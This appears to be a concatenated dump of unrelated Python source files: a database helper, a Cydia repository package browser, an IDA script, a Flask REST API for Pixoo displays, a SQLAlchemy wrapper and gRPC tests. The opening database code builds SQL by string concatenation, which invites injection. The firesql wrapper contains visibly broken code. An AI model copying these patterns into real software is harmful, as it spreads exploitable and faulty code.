for i in range(len(field)):
# print(field[i])
# print(whattoad[i])
field_text += "`" + str(field[i]) + "`,"
# if type(whattoad[i]) == int or type(whattoad[i]) == float: add_text += "" + str(whattoad[i]) + ","
add_text += "'" + str(whattoad[i]) + "',"
field_text = field_text[0:-1] + ")"
add_text = add_text[0:-1] + ")"
table = '`' + str(table) + '`'
# with self.connection:
self._print("INSERT INTO " + table + field_text + " VALUES " + add_text, 'i')
self.cursor.execute("INSERT INTO " + table + field_text + " VALUES " + add_text)
self.cursor.execute("SELECT max(id) from {}".format(table))
res = self.cursor.fetchall()
self.connection.commit()
return res[0][0]
def changeTable(self, table, field, whattoad, like):
if len(field) != len(whattoad): raise ValueError("field and whattoad aren't the same leng in changeTable")
if len(field) == 0: return True
field_text = ""
for i in range(len(field)):
field_text += "`" + str(field[i]) + "`" + "=" + "'" + str(whattoad[i]) + "',"
field_text = field_text[0:-1]
table = '`' + str(table) + '`'
# with self.connection:
self._print("UPDATE " + table + " SET " + field_text + " " + like, 'i')
self.cursor.execute("UPDATE " + table + " SET " + field_text + " " + like)
self.connection.commit()
return True
def deleteFromTable(self, table, like):
table = '`' + str(table) + '`'
# with self.connection:
self._print("DELETE FROM " + table + " " + like, 'w')
self.cursor.execute("DELETE FROM " + table + " " + like)
self.connection.commit()
return True
def user_add(self,telid, telusername, mode=0):
return self.addToTable('users',
['telid', 'telusername', 'mode'],
[telid, telusername, mode])
def user_add_all(self,telid, telusername, name, birthday,placeofbirth,adress,place,mode=0):
return self.addToTable('users',
['telid', 'telusername', 'name', 'birthday','placeofbirth','adress','place','mode','admin'],
[telid, telusername, name, birthday, placeofbirth, adress, place, mode,0])
def user_get(self,idd=None, telid=None,all=False):
like = None
if idd and type(idd)==int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid)==int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
if all:
res = self.getFromTable('users',['id','telid', 'telusername', 'name', 'birthday','placeofbirth','adress','place','mode','admin'],like)
res = self.getFromTable('users',['id','telid','name', 'birthday','placeofbirth','adress','place','mode','admin'],like)
if len(res): return res[0]
return None
def user_update(self,idd=None, telid=None, telusername=None, name=None, birthday=None,placeofbirth=None,adress=None,place=None,mode=None):
like = None
if idd and type(idd) == int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid) == int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
fields = []
values = []
if telusername:
fields.append('telusername')
values.append(telusername)
if name:
fields.append('name')
values.append(name)
if birthday:
fields.append('birthday')
values.append(birthday)
if placeofbirth:
fields.append('placeofbirth')
values.append(placeofbirth)
if adress:
fields.append('adress')
values.append(adress)
if place:
fields.append('place')
values.append(place)
if mode is not None and type(mode)==int:
fields.append('mode')
values.append(mode)
return self.changeTable('users',fields,values,like)
def user_set_mode(self,idd=None, telid=None,mode=0):
return self.user_update(idd=idd,telid=telid,mode=mode)
def user_all(self):
res = self.getFromTable('users',['id','telid'])
if len(res): return res
return None
def live_update_list(self,delta=1200,active_duration=10800): #1200
timenow = time.time()
like = "WHERE `live_update_start`>'{}' AND `live_update_last`<'{}' ORDER BY `live_update_last`".format(round(timenow - active_duration),round(timenow - delta))
return self.getFromTable('users', ['id', 'telid', 'live_update_start', 'live_update_last', 'live_update_mode'], like)
def live_update_update(self,idd=None, telid=None,last=None,start=None,mode=None):
like = None
if idd and type(idd) == int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid) == int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
fields = ['live_update_last']
if last==None:
last = round(time.time())
values = [last]
if start==-1:
fields.append('live_update_start')
values.append(round(time.time()))
elif start != None:
fields.append('live_update_start')
values.append(start)
if mode!=None:
fields.append('live_update_mode')
values.append(mode)
return self.changeTable('users', fields, values, like)
def log_add(self,idd=None, typ=0, message=''):
message = message.replace('"','').replace("'","")
like = idd or self.idd
if like is None: return None
return self.addToTable('logs',
['id_user', 'typ', 'message'],
[like, typ, message])
``` |
{
"source": "4ch12dy/cydiarepor",
"score": 2
} |
#### File: 4ch12dy/cydiarepor/cydiarepor.py
```python
import requests
#import wget
import sys
import shlex
import optparse
import gzip
import StringIO
import bz2
import urlparse
def get_default_cydia_repo_array():
default_repos = []
# BigBoss of coolstar
default_repos.append("https://repounclutter.coolstar.org")
default_repos.append("https://repo.chimera.sh")
default_repos.append("https://build.frida.re")
default_repos.append("https://coolstar.org/publicrepo")
default_repos.append("https://apt.bingner.com")
default_repos.append("https://xia0z.github.io")
return default_repos
def handle_old_cydia_repo(url):
parse_result = urlparse.urlparse(url)
scheme = '{uri.scheme}'.format(uri=parse_result)
url = url[len(scheme):]
old_BigBoss_repo = "://apt.thebigboss.org/repofiles/cydia"
old_bingner_repo = "://apt.bingner.com"
repo_package_url = ""
zip_type = ""
ret = []
if url == old_BigBoss_repo:
repo_package_url = scheme+old_BigBoss_repo + "/dists/stable/main/binary-iphoneos-arm/Packages.bz2"
zip_type = "bz2"
ret.append(repo_package_url)
ret.append(zip_type)
elif url == old_bingner_repo:
repo_package_url = scheme+old_bingner_repo + "/dists/ios/1443.00/"+"main/binary-iphoneos-arm/Packages.bz2"
zip_type = "bz2"
ret.append(repo_package_url)
ret.append(zip_type)
else:
ret = None
return ret
def is_url_reachable(url):
r = requests.get(url, allow_redirects = False)
status = r.status_code
if status == 200:
return True
return False
def unzip_data_to_string(data, unzip_type):
unzip_string = ""
if unzip_type == "gz":
compressedstream = StringIO.StringIO(data)
gziper = gzip.GzipFile(fileobj=compressedstream)
unzip_string = gziper.read()
elif unzip_type == "bz2":
unzip_string = bz2.decompress(data)
else:
print("[-] unkown zip type!")
exit(1)
return unzip_string
def http_get(url):
r = requests.get(url, stream=True)
return r
def get_debs_from_cydiarepoURL(repoURL):
# Package: com.archry.joker
# Version: 1.0.30-1+debug
# Architecture: iphoneos-arm
# Installed-Size: 588
# Depends: mobilesubstrate
# Filename: ./debs/com.archry.joker.deb.deb
# Size: 117922
# MD5sum: c5d30e1b10177190ee56eecf5dbb5cfe
# SHA1: 377d5c59926083b2acdd95028abe24edfeba6141
# SHA256: fcb97af34c56d4a2bd67540df0427cb0cbd9b68e4c4e78f555265c3db1e2b67e
# Section: Hack
# Description: Archery king hack winde , zoom and better Aiming
# Author: @Kgfunn
# Depiction: https://joker2gun.github.io/depictions/?p=com.archry.joker
# Name: Archery King Hack
cydiarepo_Packages_URL = repoURL + '/Packages'
cydiarepo_Packages_bz2_URL = repoURL + '/Packages.bz2'
cydiarepo_Packages_gz_URL = repoURL + '/Packages.gz'
if handle_old_cydia_repo(repoURL):
ret = handle_old_cydia_repo(repoURL)
zip_type = ret[1]
if zip_type == "gz":
cydiarepo_Packages_gz_URL = ret[0]
elif zip_type == "bz2":
cydiarepo_Packages_bz2_URL = ret[0]
else:
print("[-] unknown old cydia repo zip type")
exit(1)
cydiarepo_reachable_URL = ''
is_need_unzip = False
unzip_type = ''
if is_url_reachable(cydiarepo_Packages_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_URL
elif is_url_reachable(cydiarepo_Packages_bz2_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_bz2_URL
is_need_unzip = True
unzip_type = "bz2"
elif is_url_reachable(cydiarepo_Packages_gz_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_gz_URL
is_need_unzip = True
unzip_type = "gz"
else:
print("[-] {} repo not found Packages or Packages.bz2 or Packages.gz file, check it!".format(repoURL))
exit(1)
r = requests.get(cydiarepo_reachable_URL)
raw_packages_data = r.content
raw_packages_string = ""
if is_need_unzip:
raw_packages_string = unzip_data_to_string(raw_packages_data, unzip_type)
else:
raw_packages_string = raw_packages_data
raw_packages_list = raw_packages_string.split("\n\n")
repo_info = {"url":repoURL}
all_deb = []
for raw_package_string in raw_packages_list:
raw_deb_list = raw_package_string.split("\n")
cur_deb = {}
for raw_deb_str in raw_deb_list:
deb_item = raw_deb_str.split(":")
if len(deb_item) != 2:
continue
deb_item_k = deb_item[0].strip()
deb_item_v = deb_item[1].strip()
need_item_array = ["Package", "Version", "Filename", "Name", "Description"]
if deb_item_k in need_item_array:
cur_deb[deb_item_k] = deb_item_v
for k in need_item_array:
if not cur_deb.has_key(k):
cur_deb[k] = ""
cur_deb["repo"]=repo_info
if cur_deb:
all_deb.append(cur_deb)
return all_deb
def get_debs_in_default_cydia_repo():
default_repo_ulrs = get_default_cydia_repo_array()
defult_debs = []
for url in default_repo_ulrs:
debs = get_debs_from_cydiarepoURL(url)
defult_debs += debs
return defult_debs
def is_need_by_search_string(deb, contained_str):
name = deb['Name']
package = deb['Package']
description = ''
if deb.has_key('Description'):
description = deb['Description']
if contained_str in description:
return True
if contained_str in name or contained_str in package:
return True
return False
def download_deb_file(repo_url, deb):
deb_download_url = repo_url + "/./" + deb['Filename']
save_path = "./" + deb['Package'] + "_"+ deb['Version'] + ".deb"
r = http_get(deb_download_url)
deb_data = r.content
with open(save_path, 'wb') as f:
f.write(deb_data)
# wget.download(deb_download_url, save_path)
def list_all_repo_deb(debs):
print("-"*(3+30+30+4))
title = "Developed By xia0@2019 Blog:https://4ch12dy.site"
print("|"+format(title,"^65")+"|")
print("-"*(3+30+30+4))
total_str = "Total:{}".format(len(debs))
print("|"+format(total_str,"^65")+"|")
print("-"*(3+30+30+4))
print("|"+format("N", "^3") + "|" + format("package", "^30")+"|"+format("name", "^30")+"|")
print("-"*(3+30+30+4))
for i in range(len(debs)):
if (i+1) % 40 == 0:
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"]+"("+debs[i]["Version"]+")", "^30") + "|")
print("-"*(3+30+30+4))
choice = raw_input("|" + "do you want to continue?[Y/N]: ")
print("-"*(3+30+30+4))
if choice == 'N' or choice == 'n':
break
elif choice == 'Y' or choice == 'y':
continue
else:
print("[-] error choice")
exit(1)
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"], "^30") + "|")
print("-"*(3+30+30+4))
def list_deb(debs):
com_item_wid = 30
total_wid = 1+3+ (com_item_wid +1) *3 + 1
print("-"*total_wid)
print("|"+format("N", "^3") + "|" + format("package", "^30")+"|"+format("name", "^30")+"|"+format("repo url", "^30")+"|")
print("-"*total_wid)
for i in range(len(debs)):
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"]+"("+debs[i]["Version"]+")", "^30") + "|" + format(debs[i]["repo"]["url"], "^30") + "|")
print("-"*total_wid)
def generate_option_parser():
usage = "[usage]: cydiarepor [cydiarepo_url, -d] [-s <search_string>, -l]"
parser = optparse.OptionParser(usage=usage, prog="lookup")
parser.add_option("-l", "--list",
action="store_true",
default=None,
dest="listdeb",
help="list all deb package of cydia repo")
parser.add_option("-s", "--string",
action="store",
default=None,
dest="searchstring",
help="search deb by string")
parser.add_option("-d", "--default",
action="store_true",
default=None,
dest="defaultrepos",
help="search deb by string in default repos")
return parser
if __name__ == "__main__":
cydiarepoURL = ''
parser = generate_option_parser()
command_args = sys.argv[1:]
if len(command_args) == 0:
print(parser.usage)
exit(1)
try:
(options, args) = parser.parse_args(command_args)
except:
print(parser.usage)
exit(1)
if options.defaultrepos:
if options.searchstring:
need_debs = []
search_string = options.searchstring
debs = get_debs_in_default_cydia_repo()
for deb in debs:
if is_need_by_search_string(deb, search_string):
need_debs.append(deb)
list_deb(need_debs)
num = input(">> inout number of deb want to download:")
print("[*] you choose {} deb:\"{}\"".format(num, need_debs[num]['Name']))
print("[*] start to download:{}".format(need_debs[num]['Name']))
cydiarepoURL = need_debs[num]["repo"]["url"]
download_deb_file(cydiarepoURL, need_debs[num])
print("[+] download deb done")
exit(0)
if options.listdeb:
all_defualt_debs = []
for url in get_default_cydia_repo_array():
debs = get_debs_from_cydiarepoURL(url)
all_defualt_debs += debs
list_all_repo_deb(all_defualt_debs)
exit(0)
if options.listdeb:
if len(args) != 1:
print(parser.usage)
exit(1)
cydiarepoURL = args[0]
debs = get_debs_from_cydiarepoURL(cydiarepoURL)
list_all_repo_deb(debs)
exit(0)
if options.searchstring:
if len(args) != 1:
print(parser.usage)
exit(1)
need_debs = []
search_string = options.searchstring
cydiarepoURL = args[0]
debs = get_debs_from_cydiarepoURL(cydiarepoURL)
for deb in debs:
if is_need_by_search_string(deb, search_string):
need_debs.append(deb)
list_deb(need_debs)
num = input(">> inout number of deb want to download:")
print("[*] you choose {} deb:\"{}\"".format(num, need_debs[num]['Name']))
print("[*] start to download:{}".format(need_debs[num]['Name']))
download_deb_file(cydiarepoURL, need_debs[num])
print("[+] download deb done")
exit(0)
print("[-] you can not reach here!!!")
``` |
{
"source": "4ch12dy/xda",
"score": 3
} |
#### File: 4ch12dy/xda/search-dism-str.py
```python
from idaapi import *
import idc
import idautils
def lookup_str_in_func(func):
found = []
func_name = idc.get_func_name(func)
addrs = list(idautils.FuncItems(func)) # get list of all the address
for line in addrs:
dism = idc.generate_disasm_line(line, 0)
if input_str in dism:
find_item = hex(line)[:-1] + "\t"
find_item += dism + "\t"
find_item += func_name
found.append(find_item)
for one in found:
print(one)
print("----------------- [xda] search-dism-str ----------------")
input_str = idc.AskStr("", "Input string of searching:")
if not input_str or input_str == "":
print("please input the string.")
else:
for func in idautils.Functions():
flags = idc.get_func_attr(func, FUNCATTR_FLAGS)
if flags & FUNC_LIB or flags & FUNC_THUNK:
continue
lookup_str_in_func(func)
print("--------------------------------------------------------")
``` |
{
"source": "4ch1m/pixoo-rest",
"score": 2
} |
#### File: 4ch1m/pixoo-rest/app.py
```python
import os
import time
import requests
import json
import base64
from datetime import datetime
from distutils.util import strtobool
from dotenv import load_dotenv
from flask import Flask, request, redirect
from flasgger import Swagger, swag_from
from pixoo.pixoo import Channel, Pixoo
from PIL import Image
from swag import definitions
from swag import passthrough
load_dotenv()
pixoo_host = os.environ.get('PIXOO_HOST', 'Pixoo64')
pixoo_debug = os.environ.get('PIXOO_DEBUG', 'false').lower() == 'true'
while True:
try:
print(f'[ {datetime.now().strftime("%Y-%m-%d (%H:%M:%S)")} ] Trying to connect to "{pixoo_host}" ... ', end='')
if requests.get(f'http://{pixoo_host}/get').status_code == 200:
print('OK.')
break
except:
print('FAILED. (Sleeping 30 seconds.)')
time.sleep(30)
pixoo = Pixoo(
pixoo_host,
int(os.environ.get('PIXOO_SCREEN_SIZE', 64)),
pixoo_debug
)
app = Flask(__name__)
app.config['SWAGGER'] = {
'title': 'Pixoo REST',
'version': '1.0.0',
'description': 'A RESTful API to easily interact with the Wi-Fi enabled {} devices.'.format(
'<a href="https://www.divoom.com/de/products/pixoo-64">Divoom Pixoo</a>'
),
'termsOfService': ''
}
swagger = Swagger(app)
definitions.create(swagger)
def _push_immediately(_request):
if strtobool(_request.form.get('push_immediately', default=True)):
pixoo.push()
@app.route('/', methods=['GET'])
def home():
return redirect('/apidocs')
@app.route('/brightness/<int:percentage>', methods=['PUT'])
@swag_from('swag/set/brightness.yml')
def brightness(percentage):
pixoo.set_brightness(percentage)
return 'OK'
@app.route('/channel/<int:number>', methods=['PUT'])
@app.route('/face/<int:number>', methods=['PUT'])
@app.route('/visualizer/<int:number>', methods=['PUT'])
@app.route('/clock/<int:number>', methods=['PUT'])
@swag_from('swag/set/generic_number.yml')
def generic_set_number(number):
if request.path.startswith('/channel'):
pixoo.set_channel(Channel(number))
elif request.path.startswith('/face'):
pixoo.set_face(number)
elif request.path.startswith('/visualizer'):
pixoo.set_visualizer(number)
elif request.path.startswith('/clock'):
pixoo.set_clock(number)
return 'OK'
@app.route('/image', methods=['POST'])
@swag_from('swag/draw/image.yml')
def image():
pixoo.draw_image_at_location(
Image.open(request.files['image'].stream),
int(request.form.get('x')),
int(request.form.get('y'))
)
_push_immediately(request)
return 'OK'
@app.route('/text', methods=['POST'])
@swag_from('swag/draw/text.yml')
def text():
pixoo.draw_text_at_location_rgb(
request.form.get('text'),
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/fill', methods=['POST'])
@swag_from('swag/draw/fill.yml')
def fill():
pixoo.fill_rgb(
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/line', methods=['POST'])
@swag_from('swag/draw/line.yml')
def line():
pixoo.draw_line_from_start_to_stop_rgb(
int(request.form.get('start_x')),
int(request.form.get('start_y')),
int(request.form.get('stop_x')),
int(request.form.get('stop_y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/rectangle', methods=['POST'])
@swag_from('swag/draw/rectangle.yml')
def rectangle():
pixoo.draw_filled_rectangle_from_top_left_to_bottom_right_rgb(
int(request.form.get('top_left_x')),
int(request.form.get('top_left_y')),
int(request.form.get('bottom_right_x')),
int(request.form.get('bottom_right_y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/pixel', methods=['POST'])
@swag_from('swag/draw/pixel.yml')
def pixel():
pixoo.draw_pixel_at_location_rgb(
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/character', methods=['POST'])
@swag_from('swag/draw/character.yml')
def character():
pixoo.draw_character_at_location_rgb(
request.form.get('character'),
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/sendText', methods=['POST'])
@swag_from('swag/send/text.yml')
def send_text():
pixoo.send_text(
request.form.get('text'),
(int(request.form.get('x')), int(request.form.get('y'))),
(int(request.form.get('r')), int(request.form.get('g')), int(request.form.get('b'))),
(int(request.form.get('identifier'))),
(int(request.form.get('font'))),
(int(request.form.get('width'))),
(int(request.form.get('movement_speed'))),
(int(request.form.get('direction')))
)
return 'OK'
def _reset_gif():
return requests.post(f'http://{pixoo.address}/post', json.dumps({
"Command": "Draw/ResetHttpGifId"
})).json()
def _send_gif(num, offset, width, speed, data):
return requests.post(f'http://{pixoo.address}/post', json.dumps({
"Command": "Draw/SendHttpGif",
"PicID": 1,
"PicNum": num,
"PicOffset": offset,
"PicWidth": width,
"PicSpeed": speed,
"PicData": data
})).json()
@app.route('/sendGif', methods=['POST'])
@swag_from('swag/send/gif.yml')
def send_gif():
gif = Image.open(request.files['gif'].stream)
speed = int(request.form.get('speed'))
if gif.is_animated:
_reset_gif()
for i in range(gif.n_frames):
gif.seek(i)
if gif.size not in ((16, 16), (32, 32), (64, 64)):
gif_frame = gif.resize((pixoo.size, pixoo.size)).convert("RGB")
else:
gif_frame = gif.convert("RGB")
_send_gif(
gif.n_frames,
i,
gif_frame.width,
speed,
base64.b64encode(gif_frame.tobytes()).decode("utf-8")
)
else:
pixoo.draw_image(gif)
pixoo.push()
return 'OK'
passthrough_routes = {
# channel ...
'/passthrough/channel/setIndex': passthrough.create(*passthrough.channel_set_index),
'/passthrough/channel/setCustomPageIndex': passthrough.create(*passthrough.channel_set_custom_page_index),
'/passthrough/channel/setEqPosition': passthrough.create(*passthrough.channel_set_eq_position),
'/passthrough/channel/cloudIndex': passthrough.create(*passthrough.channel_cloud_index),
'/passthrough/channel/getIndex': passthrough.create(*passthrough.channel_get_index),
'/passthrough/channel/setBrightness': passthrough.create(*passthrough.channel_set_brightness),
'/passthrough/channel/getAllConf': passthrough.create(*passthrough.channel_get_all_conf),
'/passthrough/channel/onOffScreen': passthrough.create(*passthrough.channel_on_off_screen),
# sys ...
'/passthrough/sys/logAndLat': passthrough.create(*passthrough.sys_log_and_lat),
'/passthrough/sys/timeZone': passthrough.create(*passthrough.sys_timezone),
# device ...
'/passthrough/device/setUTC': passthrough.create(*passthrough.device_set_utc),
# tools ...
'/passthrough/tools/setTimer': passthrough.create(*passthrough.tools_set_timer),
'/passthrough/tools/setStopWatch': passthrough.create(*passthrough.tools_set_stop_watch),
'/passthrough/tools/setScoreBoard': passthrough.create(*passthrough.tools_set_score_board),
'/passthrough/tools/setNoiseStatus': passthrough.create(*passthrough.tools_set_noise_status),
# draw ...
'/passthrough/draw/sendHttpText': passthrough.create(*passthrough.draw_send_http_text),
'/passthrough/draw/clearHttpText': passthrough.create(*passthrough.draw_clear_http_text),
'/passthrough/draw/sendHttpGif': passthrough.create(*passthrough.draw_send_http_gif),
'/passthrough/draw/resetHttpGifId': passthrough.create(*passthrough.draw_reset_http_gif_id),
}
def _passthrough_request(passthrough_request):
return requests.post(f'http://{pixoo.address}/post', json.dumps(passthrough_request.json)).json()
for _route, _swag in passthrough_routes.items():
exec(f"""
@app.route('{_route}', methods=['POST'], endpoint='{_route}')
@swag_from({_swag}, endpoint='{_route}')
def passthrough_{list(passthrough_routes.keys()).index(_route)}():
return _passthrough_request(request)
""")
if __name__ == '__main__':
app.run()
```
#### File: pixoo-rest/swag/definitions.py
```python
def create(swagger):
@swagger.definition('form_param_x')
class FormParamX:
"""
Horizontal pixel position.
---
name: x
in: formData
type: integer
minimum: '0'
default: '0'
required: true
"""
@swagger.definition('form_param_y')
class FormParamY:
"""
Vertical pixel position.
---
name: y
in: formData
type: integer
minimum: '0'
default: '0'
required: true
"""
@swagger.definition('form_param_r')
class FormParamR:
"""
RGB - Red color value.
---
name: r
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_g')
class FormParamG:
"""
RGB - Green color value.
---
name: g
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_b')
class FormParamB:
"""
RGB - Blue color value.
---
name: b
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_push_immediately')
class FormParamPushImmediately:
"""
Push draw buffer to the device immediately after this operation?
---
name: push_immediately
in: formData
type: boolean
default: true
required: true
"""
``` |
{
"source": "4CodersColombia/firesql",
"score": 3
} |
#### File: firesql/firesql/__init__.py
```python
import datetime
from typing import Any
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine, MetaData, engine
from sqlalchemy import Column, Integer, String, DateTime, Boolean, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql.functions import mode
from sqlalchemy.sql.schema import ForeignKey
import os
from functools import reduce
class Float(Float):
pass
class Column(Column):
pass
class Integer(Integer):
pass
class String(String):
pass
class DateTime(DateTime):
pass
class Boolean(Boolean):
pass
class ForeignKey(ForeignKey):
pass
class FiresqlBase():
def begin(self):
return declarative_base()
or_ = sqlalchemy.sql.or_
and_ = sqlalchemy.sql.and_
class dotdict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
class NewSesion(sessionmaker):
def add(self, instance):
super.begin_nested()
super.add(instance)
def commit(self):
super.commit()
def close(self):
super.close()
def delete(self, instance):
super.delete(instance)
def rollback(self):
super.rollback()
def query(self, *args):
super.query(**args)
class ErrorGetData(Exception):
pass
class ErrorFilterData(Exception):
def __init__(self, value):
message = f"Got an incorrect filter list {value}"
super().__init__(message)
class FilterSingledRead():
value: Any
type: str
name: str
def __init__(self, my_dict, name):
self.name = name
for key in my_dict:
setattr(self, key, my_dict[key])
class Firesql(object):
conn: engine
def connect_sql(self, host_name: str, user_name: str, user_password: str, db_name: str, port=3306):
try:
self.conn = create_engine(
f"mysql+pymysql://{user_name}:{user_password}@{host_name}:{port}/{db_name}")
# Set environment variables
os.environ['DATABASE_URL'] = "mysql+pymysql://{user_name}:{user_password}@{host_name}:{port}/{db_name}"
self.metadata = MetaData(self.conn)
print("Connection to MySQL DB successful")
except Exception as e:
print(f"The error '{e}' occurred")
def create_all(self, base):
base.metadata.create_all(self.conn)
def drop_all(self, base):
base.metadata.drop_all(self.conn)
def session(self):
Sess = NewSesion(bind=self.conn)
session: NewSesion = Sess()
return session
def singled_read(
self,
model,
page=0,
page_size=50,
filters=None,
type_class=True,
data_filter: dict = {},
or_join=False,
order_by=None,
ascendent=True,
):
session = self.session()
query = session.query(model)
if data_filter:
filter_data = self.validate_data_singled_read(
model, data_filter, or_join)
query = query.filter(filter_data)
if filters is not None:
query = query.filter(filters)
total_count = query.count()
if order_by is not None:
order = getattr(model, order_by).asc(
) if ascendent else getattr(model, order_by).desc()
query = query.order_by(order)
if page_size > 0:
query = query.limit(page_size)
if page > 0:
query = query.offset(page * page_size)
data: list[type[model]] = query.all()
if not type_class:
list_data = list(map(lambda x: x.__dict__, data))
return list(map(self.iterdict, list_data)), total_count
return data, total_count
def validate_data_singled_read(self, model, filter_data: dict, or_join=False):
values_in_model = dir(model)
get_filter_data = list(filter_data.keys())
if not set(get_filter_data).issubset(set(values_in_model)):
raise ErrorFilterData(get_filter_data)
filter = []
def get_filter(filter, type: str, value):
if type == 'like':
return getattr(filter, 'ilike')("%{}%".format(value))
elif type == 'equal':
return filter == value
elif type == 'higher':
return filter > value
elif type == 'lowwer':
return filter < value
else:
return None
for key in filter_data.keys():
new_filter_data = FilterSingledRead(filter_data[key], key)
new_filter = getattr(model, new_filter_data.name)
filter_type = get_filter(
new_filter, new_filter_data.type, new_filter_data.value)
if filter_type is not None:
filter.append(filter_type)
if or_join:
return or_(*filter)
return and_(*filter)
def iterdict(self, d):
for k, v in d.items():
if isinstance(v, dict):
self.iterdict(v)
else:
if type(v) == datetime.datetime:
v = str(v)
d.update({k: v})
return d
``` |
{
"source": "4con/grpc-win-xp",
"score": 2
} |
#### File: unit/_cython/_channel_test.py
```python
import time
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit.framework.common import test_constants
def _channel_and_completion_queue():
channel = cygrpc.Channel(b'localhost:54321', ())
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(connectivity,
time.time() + 0.2, completion_queue,
None)
completion_queue.poll()
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(test_constants.THREAD_CONCURRENCY))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (
channel,
completion_queue,
))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
```
#### File: interfaces/face/_blocking_invocation_inline_service.py
```python
from __future__ import division
import abc
import itertools
import unittest
from concurrent import futures
import six
# test_interfaces is referenced from specification in this module.
from grpc.framework.foundation import logging_pool
from grpc.framework.interfaces.face import face
from tests.unit.framework.common import test_constants
from tests.unit.framework.common import test_control
from tests.unit.framework.common import test_coverage
from tests.unit.framework.interfaces.face import _3069_test_constant
from tests.unit.framework.interfaces.face import _digest
from tests.unit.framework.interfaces.face import _stock_service
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
class TestCase(
six.with_metaclass(abc.ABCMeta, test_coverage.Coverage,
unittest.TestCase)):
"""A test of the Face layer of RPC Framework.
Concrete subclasses must have an "implementation" attribute of type
test_interfaces.Implementation and an "invoker_constructor" attribute of type
_invocation.InvokerConstructor.
"""
NAME = 'BlockingInvocationInlineServiceTest'
def setUp(self):
"""See unittest.TestCase.setUp for full specification.
Overriding implementations must call this implementation.
"""
self._control = test_control.PauseFailControl()
self._digest = _digest.digest(_stock_service.STOCK_TEST_SERVICE,
self._control, None)
generic_stub, dynamic_stubs, self._memo = self.implementation.instantiate(
self._digest.methods, self._digest.inline_method_implementations,
None)
self._invoker = self.invoker_constructor.construct_invoker(
generic_stub, dynamic_stubs, self._digest.methods)
def tearDown(self):
"""See unittest.TestCase.tearDown for full specification.
Overriding implementations must call this implementation.
"""
self._invoker = None
self.implementation.destantiate(self._memo)
def testSuccessfulUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
response, call = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT, with_call=True)
test_messages.verify(request, response, self)
def testSuccessfulUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(request, responses, self)
def testSuccessfulStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response, call = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT, with_call=True)
test_messages.verify(requests, response, self)
def testSuccessfulStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(requests, responses, self)
def testSequentialInvocations(self):
for (group, method), test_messages_sequence in (six.iteritems(
